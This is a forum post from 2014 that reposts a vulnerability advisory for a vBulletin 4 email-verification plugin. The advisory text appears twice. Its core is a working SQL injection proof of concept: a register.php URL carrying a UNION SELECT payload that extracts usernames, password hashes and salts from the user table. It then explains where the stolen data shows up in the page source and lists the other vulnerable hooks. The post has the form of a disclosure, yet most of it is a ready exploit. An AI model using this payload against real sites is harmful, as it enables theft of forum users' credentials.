Server_CM
12-04-2014, 08:37 PM
#Title: vBulletin Verify Email Before Registration Plugin - SQL Injection
#Date: September 19 2014
#Version: Any vBulletin 4.*.* version which has the plugin installed.
#Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
#Author: Dave (FW/FG)
The vulnerability resides in the register_form_complete hook, and some
other hooks.
The POST/GET data is not sanitized before being used in queries.
SQL injection at:
http://example.com/register.php?so=1&emailcode=[sqli]
PoC:
http://example.com/register.php?so=1&emailcode=1' UNION SELECT null,
concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM
user WHERE userid = '1
Now look at the source of the page and find:
<input type="text" style="display: none" name="email" id="email"
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
<input type="text" style="display: none" name="emailconfirm" id="email"
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change
your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)
#Date: September 19 2014
#Version: Any vBulletin 4.*.* version which has the plugin installed.
#Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
#Author: Dave (FW/FG)
The vulnerability resides in the register_form_complete hook, and some
other hooks.
The POST/GET data is not sanitized before being used in queries.
SQL injection at:
http://example.com/register.php?so=1&emailcode=[sqli]
PoC:
http://example.com/register.php?so=1&emailcode=1' UNION SELECT null,
concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM
user WHERE userid = '1
Now look at the source of the page and find:
<input type="text" style="display: none" name="email" id="email"
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
<input type="text" style="display: none" name="emailconfirm" id="email"
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change
your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)